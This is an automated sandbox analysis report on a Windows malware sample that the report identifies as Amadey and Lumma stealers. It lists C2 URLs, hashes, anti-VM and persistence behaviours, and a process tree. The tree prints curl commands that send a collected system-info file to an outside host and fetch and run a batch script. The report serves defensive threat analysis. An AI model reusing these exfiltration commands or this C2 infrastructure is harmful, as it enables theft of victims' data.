Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-12-2024 16:49
Static task
static1
Behavioral task
behavioral1
Sample
1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe
Resource
win7-20240729-en
General
-
Target
1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe
-
Size
3.1MB
-
MD5
f699d03687f5a293790e089b3079b8eb
-
SHA1
af9489c0dcccc390ee87725524755817a4e097f5
-
SHA256
1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095
-
SHA512
1a31859a61f0c93b39128d9879a43f28e627b82e96a2442d64ca6ab30558904cd718b5e151b18237d75b648d792486ffdbe0663b2807cb3d295dca4ca6b98ae8
-
SSDEEP
49152:aKs8Du1a2GYwhLyZgrPW8iyS2MUliJOliNoPZMMDpdIcuU:aKs8DVYwhLyOrPt1LMUlqOliNx8fb
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
https://drive-connect.cyou/api
Extracted
lumma
https://drive-connect.cyou/api
https://covery-mover.biz/api
Signatures
-
Amadey family
-
Lumma family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation 1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe cmd.exe -
Executes dropped EXE 11 IoCs
pid Process 3912 skotes.exe 3528 f0c53a142d.exe 4392 f0c53a142d.exe 2100 f0c53a142d.exe 3096 skotes.exe 4356 M5iFR20.exe 3880 skotes.exe 1380 W4KLQf7.exe 3668 dwVrTdy.exe 1356 graph.exe 1148 skotes.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine skotes.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" dwVrTdy.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 75 drive.google.com 76 drive.google.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 89 ipinfo.io 90 ipinfo.io -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0008000000023bf0-59.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 1652 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 552 1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe 3912 skotes.exe 3096 skotes.exe 3880 skotes.exe 1148 skotes.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3528 set thread context of 2100 3528 f0c53a142d.exe 88 -
Drops file in Program Files directory 5 IoCs
description ioc Process File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f dwVrTdy.exe File created C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip dwVrTdy.exe File created C:\Program Files\Windows Media Player\graph\graph.exe dwVrTdy.exe File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip dwVrTdy.exe File opened for modification C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f dwVrTdy.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language M5iFR20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language systeminfo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language W4KLQf7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f0c53a142d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f0c53a142d.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1224 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 552 1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe 552 1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe 3912 skotes.exe 3912 skotes.exe 3096 skotes.exe 3096 skotes.exe 3880 skotes.exe 3880 skotes.exe 3668 dwVrTdy.exe 3668 dwVrTdy.exe 3668 dwVrTdy.exe 3668 dwVrTdy.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1148 skotes.exe 1148 skotes.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe 1356 graph.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1652 tasklist.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 552 1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe 4356 M5iFR20.exe 4356 M5iFR20.exe 4356 M5iFR20.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 4356 M5iFR20.exe 4356 M5iFR20.exe 4356 M5iFR20.exe -
Suspicious use of WriteProcessMemory 56 IoCs
description pid Process procid_target PID 552 wrote to memory of 3912 552 1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe 83 PID 552 wrote to memory of 3912 552 1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe 83 PID 552 wrote to memory of 3912 552 1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe 83 PID 3912 wrote to memory of 3528 3912 skotes.exe 85 PID 3912 wrote to memory of 3528 3912 skotes.exe 85 PID 3912 wrote to memory of 3528 3912 skotes.exe 85 PID 3528 wrote to memory of 4392 3528 f0c53a142d.exe 87 PID 3528 wrote to memory of 4392 3528 f0c53a142d.exe 87 PID 3528 wrote to memory of 4392 3528 f0c53a142d.exe 87 PID 3528 wrote to memory of 2100 3528 f0c53a142d.exe 88 PID 3528 wrote to memory of 2100 3528 f0c53a142d.exe 88 PID 3528 wrote to memory of 2100 3528 f0c53a142d.exe 88 PID 3528 wrote to memory of 2100 3528 f0c53a142d.exe 88 PID 3528 wrote to memory of 2100 3528 f0c53a142d.exe 88 PID 3528 wrote to memory of 2100 3528 f0c53a142d.exe 88 PID 3528 wrote to memory of 2100 3528 f0c53a142d.exe 88 PID 3528 wrote to memory of 2100 3528 f0c53a142d.exe 88 PID 3528 wrote to memory of 2100 3528 f0c53a142d.exe 88 PID 3528 wrote to memory of 2100 3528 f0c53a142d.exe 88 PID 3912 wrote to memory of 4356 3912 skotes.exe 106 PID 3912 wrote to memory of 4356 3912 skotes.exe 106 PID 3912 wrote to memory of 4356 3912 skotes.exe 106 PID 4356 wrote to memory of 340 4356 M5iFR20.exe 107 PID 4356 wrote to memory of 340 4356 M5iFR20.exe 107 PID 4356 wrote to memory of 340 4356 M5iFR20.exe 107 PID 340 wrote to memory of 1224 340 cmd.exe 109 PID 340 wrote to memory of 1224 340 cmd.exe 109 PID 340 wrote to memory of 1224 340 cmd.exe 109 PID 340 wrote to memory of 1652 340 cmd.exe 114 PID 340 wrote to memory of 1652 340 cmd.exe 114 PID 340 wrote to memory of 1652 340 cmd.exe 114 PID 4356 wrote to memory of 3188 4356 M5iFR20.exe 115 PID 4356 wrote to memory of 3188 4356 M5iFR20.exe 115 PID 4356 wrote to memory of 3188 4356 M5iFR20.exe 115 PID 4356 wrote to memory of 3688 4356 M5iFR20.exe 118 PID 4356 wrote to memory of 3688 4356 M5iFR20.exe 118 PID 4356 wrote to memory of 3688 4356 M5iFR20.exe 118 PID 4356 wrote to memory of 760 4356 M5iFR20.exe 121 PID 4356 wrote to memory of 760 4356 M5iFR20.exe 121 PID 4356 wrote to memory of 760 4356 M5iFR20.exe 121 PID 4356 wrote to memory of 2800 4356 M5iFR20.exe 122 PID 4356 wrote to memory of 2800 4356 M5iFR20.exe 122 PID 4356 wrote to memory of 2800 4356 M5iFR20.exe 122 PID 4356 wrote to memory of 4752 4356 M5iFR20.exe 126 PID 4356 wrote to memory of 4752 4356 M5iFR20.exe 126 PID 4356 wrote to memory of 4752 4356 M5iFR20.exe 126 PID 4356 wrote to memory of 316 4356 M5iFR20.exe 128 PID 4356 wrote to memory of 316 4356 M5iFR20.exe 128 PID 4356 wrote to memory of 316 4356 M5iFR20.exe 128 PID 3912 wrote to memory of 1380 3912 skotes.exe 134 PID 3912 wrote to memory of 1380 3912 skotes.exe 134 PID 3912 wrote to memory of 1380 3912 skotes.exe 134 PID 3912 wrote to memory of 3668 3912 skotes.exe 135 PID 3912 wrote to memory of 3668 3912 skotes.exe 135 PID 3668 wrote to memory of 1356 3668 dwVrTdy.exe 137 PID 3668 wrote to memory of 1356 3668 dwVrTdy.exe 137 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe"C:\Users\Admin\AppData\Local\Temp\1ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Users\Admin\AppData\Local\Temp\1014060001\f0c53a142d.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\f0c53a142d.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Users\Admin\AppData\Local\Temp\1014060001\f0c53a142d.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\f0c53a142d.exe"4⤵
- Executes dropped EXE
PID:4392
-
-
C:\Users\Admin\AppData\Local\Temp\1014060001\f0c53a142d.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\f0c53a142d.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2100
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe"C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\SysWOW64\cmd.execmd /c systeminfo > tmp.txt && tasklist >> tmp.txt4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:340 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo5⤵
- System Location Discovery: System Language Discovery
- Gathers system information
PID:1224
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F4B424B574745424B2F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:3188
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F4B424B574745424B2F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:3688
-
-
C:\Windows\SysWOW64\cmd.execmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:760
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F4B424B574745424B2F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:2800
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt4⤵
- System Location Discovery: System Language Discovery
PID:4752
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F4B424B574745424B2F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:316
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014365001\W4KLQf7.exe"C:\Users\Admin\AppData\Local\Temp\1014365001\W4KLQf7.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1380
-
-
C:\Users\Admin\AppData\Local\Temp\1014430001\dwVrTdy.exe"C:\Users\Admin\AppData\Local\Temp\1014430001\dwVrTdy.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Program Files\Windows Media Player\graph\graph.exe"C:\Program Files\Windows Media Player\graph\graph.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1356
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3096
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3880
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1148
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
245KB
MD57d254439af7b1caaa765420bea7fbd3f
SHA17bd1d979de4a86cb0d8c2ad9e1945bd351339ad0
SHA256d6e7ceb5b05634efbd06c3e28233e92f1bd362a36473688fbaf952504b76d394
SHA512c3164b2f09dc914066201562be6483f61d3c368675ac5d3466c2d5b754813b8b23fd09af86b1f15ab8cc91be8a52b3488323e7a65198e5b104f9c635ec5ed5cc
-
Filesize
710KB
MD528e568616a7b792cac1726deb77d9039
SHA139890a418fb391b823ed5084533e2e24dff021e1
SHA2569597798f7789adc29fbe97707b1bd8ca913c4d5861b0ad4fdd6b913af7c7a8e2
SHA51285048799e6d2756f1d6af77f34e6a1f454c48f2f43042927845931b7ecff2e5de45f864627a3d4aa061252401225bbb6c2caa8532320ccbe401e97c9c79ac8e5
-
Filesize
898KB
MD55950611ed70f90b758610609e2aee8e6
SHA1798588341c108850c79da309be33495faf2f3246
SHA2565270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4
SHA5127e51c458a9a2440c778361eb19f0c13ea4de75b2cf54a5828f6230419fbf52c4702be4f0784e7984367d67fabf038018e264e030e4a4c7dac7ba93e5c1395b80
-
Filesize
3.7MB
MD512c766cab30c7a0ef110f0199beda18b
SHA1efdc8eb63df5aae563c7153c3bd607812debeba4
SHA2567b2070ca45ec370acba43623fb52931ee52bee6f0ce74e6230179b058fa2c316
SHA51232cad9086d9c7a8d88c3bfcb0806f350f0df9624637439f1e34ab2efffa0c273faef0c226c388ed28f07381aef0655af9e3eb3e9557cbfd2d8c915b556b1cf10
-
Filesize
591KB
MD53567cb15156760b2f111512ffdbc1451
SHA12fdb1f235fc5a9a32477dab4220ece5fda1539d4
SHA2560285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630
SHA512e7a31b016417218387a4702e525d33dd4fe496557539b2ab173cec0cb92052c750cfc4b3e7f02f3c66ac23f19a0c8a4eb6c9d2b590a5e9faeb525e517bc877ba
-
Filesize
3.1MB
MD5f699d03687f5a293790e089b3079b8eb
SHA1af9489c0dcccc390ee87725524755817a4e097f5
SHA2561ad2a88ab2ea0ffdaca780f48fee4da5361f67ba6923054c5d07e3bb71e4e095
SHA5121a31859a61f0c93b39128d9879a43f28e627b82e96a2442d64ca6ab30558904cd718b5e151b18237d75b648d792486ffdbe0663b2807cb3d295dca4ca6b98ae8
-
Filesize
2B
MD581051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d
-
Filesize
34B
MD5557464a645cbcc72fb20348e1c58dbfd
SHA12a68b1e4c9cca06c959a3174058a27da0faddadd
SHA2562fb99e1172ec47d7d0a943294a483e9c695d774ad9eca0c689eb0e4ad4982c66
SHA512728fba91e931258ed5ad1ff48299193384c0053770e05c0f813e8407dd328454c2c233da52ea67eb5aaf1c523a8d0e5de5a30b9bc94186e62c204b26df23123e
-
Filesize
9KB
MD54d301538ebf0d9e0a5e60561443adab3
SHA1fb74494d0cd550a83065affeb3253236e873501a
SHA25675183a263177dbdbf6dbb1efb28a9d8e2a98b2474f6197f0863e93be231b05d6
SHA5120e8e15387ac1676a8f972d371e37e6443b5d3783324b708fda46d3cf26d31bcfceb83303fe4cf5b02f70bf9648ac34181b90ef3dab3427302204ea5ffc5ce17e